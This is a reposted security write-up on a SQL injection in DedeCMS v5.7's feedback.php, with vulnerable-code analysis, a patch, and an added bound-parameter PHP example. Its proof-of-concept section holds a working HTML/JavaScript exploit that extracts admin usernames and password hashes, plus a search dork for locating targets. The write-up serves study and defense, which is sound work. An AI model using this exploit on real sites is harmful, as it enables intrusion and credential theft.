dedecms /plus/feedback.php SQL Injection Vul
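catalog
1. Vulnerability description
2. Vulnerability trigger conditions
3. Affected scope
4. Vulnerable code analysis
5. Defense
6. Attack and defense considerations

1. Vulnerability description
1. plus\feedback.php in Dedecms v5.7 does not properly validate user-supplied input, so its implementation contains an SQL injection vulnerability
2. An attacker can use the DEDECMS variable-overwrite vulnerability to inject a WEBSHELL payload into the database
3. In a second code flow, the attacker can trigger second-order injection
Relevant Link:
http://sebug.net/vuldb/ssvid-60549
http://www.venustech.com.cn/NewsInfo/124/17697.Html
http://www.sorry404.com/chengxuwenti/20140504/47.html
2. Vulnerability trigger conditions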
0x1: POC
<html>
<head>
<title>DedeCms v5.7 feedback.php exp</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<script language='javascript'>
y = document.form1.addr.value;
function exploit()
{
    var yanzhen = document.getElementById("yanzhen").value;
    var aid = document.getElementById("aid").value;
    var sqli = document.getElementById("sqli").value;
    document.form1.typeid.value = "0','3','4','5','0','1351739660', '0','0','0','0','0','aaaaaa'), ('" + aid +"','2',@`'`,'4','5','1','1351739660', '0','0','0','0','0',"+sqli+")#";
    document.form1.action = document.form1.addr.value + "/plus/feedback.php";
    document.form1.te.name = "action";
    document.form1.submit();
}
function getyanzhen()
{
    var x = "<img src='"+ document.form1.addr.value +"/include/vdimgck.php' width='60' height='24' onclick=\"this.src=this.src+'?'\">";
    document.body.innerHTML+=x;
    document.form1.addr.value = y;
}
function look()
{
    window.location.href = document.form1.addr.value+"/plus/feedback.php?aid="+document.getElementById("aid").value;
}
</script>
</head>
<body>
############################################################<br/>
DedeCms v5.7 feedback.php $typeid SQLi<br/>
Dork:inurl:plus/feedback.php?aid=<br/>
############################################################<br/><br/>
<form action="xxx" method="get" name="form1" target="_blank">
程序URL:<input type="text" id="addr" value="http://" /><br/>
驗證碼:<input type="text" name="validate" id="yanzhen" value=""/><br/>
存在的Aid:<input type="text" id="aid" value="1"/><br/>
SQL注入語句:<input type="text" id="sqli" value="(SELECT concat(uname,0x5f,pwd,0x5f) FROM `dede_admin`)" style="width:500px;"/><br/>
<input type="hidden" name="" id="te" value="send"/>
<input type="hidden" name="comtype" value="comments"/>
<input type="hidden" name="fid" value="1"/>
<input type="hidden" name="isconfirm" value="yes"/>
<input type="hidden" name="msg" value="90sec"/>
<input type="hidden" name="typeid" value=""/>
<input type="button" onclick="getyanzhen();" value="獲取驗證碼">
<input type="button" onClick="exploit()" value="#Exploit#" />
<input type="button" onClick="look()" value="查看結果" /><br/>
</form>
</body>
</html>
Relevant Link:
http://www.oday.pw/WEBanquan/111312.html
3. Affected scope
4. Vulnerable code analysis
\plus\feedback.php
..
//Save the comment content
if($comtype == 'comments')
{
    $arctitle = addslashes($title);
    if($msg!='')
    {
        //$typeid is never initialized
        $inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`)VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); ";
        $rs = $dsql->ExecuteNoneQuery($inquery);
        if(!$rs)
        {
            ShowMsg(' 發表評論錯誤! ', '-1');
            //echo $dsql->GetError();
            exit();
        }
    }
}
//Quoted reply
elseif ($comtype == 'reply')
{
    $row = $dsql->GetOne("Select * from `#@__feedback` where id ='$fid'");
    //$row['arctitle'] read back from the database is not effectively filtered, which causes second-order injection
    $arctitle = $row['arctitle'];
    $aid =$row['aid'];
    $msg = $quotemsg.$msg;
    $msg = HtmlReplace($msg,2);
    $inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";
    $dsql->ExecuteNoneQuery($inquery);
}
..
Relevant Link:
http://www.yunsec.net/a/security/web/jbst/2012/1103/11816.html
5. Defense
\plus\feedback.php
//Save the comment content
if($comtype == 'comments')
{
    $arctitle = addslashes($title);
    /* Added normalization and filtering logic */
    $typeid = intval($typeid);
    $ischeck = intval($ischeck);
    $feedbacktype = preg_replace("#[^0-9a-z]#i", "", $feedbacktype);
    /**/
    if($msg!='')
    {
        //$typeid is never initialized
        $inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`)VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); ";
        $rs = $dsql->ExecuteNoneQuery($inquery);
        if(!$rs)
        {
            ShowMsg(' 發表評論錯誤! ', '-1');
            //echo $dsql->GetError();
            exit();
        }
    }
}
//Quoted reply
elseif ($comtype == 'reply')
{
    $row = $dsql->GetOne("Select * from `#@__feedback` where id ='$fid'");
    //$row['arctitle'] read back from the database is not effectively filtered, which causes second-order injection
    $arctitle = $row['arctitle'];
    /* Added escaping logic */
    $arctitle = addslashes($row['arctitle']);
    /* */
    $aid =$row['aid'];
    $msg = $quotemsg.$msg;
    $msg = HtmlReplace($msg,2);
    $inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";
    $dsql->ExecuteNoneQuery($inquery);
}
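Added example, not part of the original post and not DedeCMS code: the same comment-then-reply flow with bound parameters, showing why a value that was escaped on the way in is raw again when it is read back, and how strict validation of typeid differs from intval(). It assumes PHP with the pdo_sqlite extension; the `feedback` table is a simplified stand-in for `#@__feedback`, `parse_typeid` is a hypothetical helper, and the sample title is constructed.

```php
<?php
// Added example, not DedeCMS code. The `feedback` table is a simplified,
// hypothetical stand-in for `#@__feedback`; the sample title is constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE feedback (id INTEGER PRIMARY KEY, aid INTEGER,
           typeid INTEGER, arctitle TEXT, msg TEXT)');

// Hypothetical helper: reject anything that is not a non-negative integer.
// Unlike intval(), it does not silently coerce malformed input to a number.
function parse_typeid($raw): int
{
    $v = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($v === false) {
        throw new InvalidArgumentException('typeid must be a non-negative integer');
    }
    return $v;
}

$insert = $db->prepare(
    'INSERT INTO feedback (aid, typeid, arctitle, msg) VALUES (?, ?, ?, ?)');

// 1. First comment: the title reaches the database as the raw string, exactly
//    as it does after addslashes() + MySQL unescaping in the original flow.
$insert->execute([1, parse_typeid('0'), "Editor's picks", 'first comment']);
$fid = (int) $db->lastInsertId();

// 2. Reply path: the stored row is read back, as in the 'reply' branch.
$select = $db->prepare('SELECT aid, arctitle FROM feedback WHERE id = ?');
$select->execute([$fid]);
$row = $select->fetch(PDO::FETCH_ASSOC);

// 3a. Pre-patch pattern: stored data concatenated into a new statement.
//     The apostrophe ends the string literal early and the statement fails.
$concat = "INSERT INTO feedback (aid, typeid, arctitle, msg) "
        . "VALUES ('{$row['aid']}', '0', '{$row['arctitle']}', 'reply')";
try {
    $db->exec($concat);
    echo "concatenated insert: executed\n";
} catch (PDOException $e) {
    echo "concatenated insert: stored data altered the statement\n";
}

// 3b. Bound parameters: the stored title is data only, whatever it contains.
$insert->execute([(int) $row['aid'], parse_typeid('0'), $row['arctitle'], 'reply']);
$stored = $db->query('SELECT arctitle FROM feedback ORDER BY id DESC LIMIT 1')
             ->fetchColumn();
echo ($stored === "Editor's picks") ? "bound insert: title stored intact\n"
                                    : "bound insert: title changed\n";
```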
6. Attack and defense considerations
Copyright (c) 2015 LittleHann All rights reserved
Reposted from: https://www.cnblogs.com/LittleHann/p/4507729.html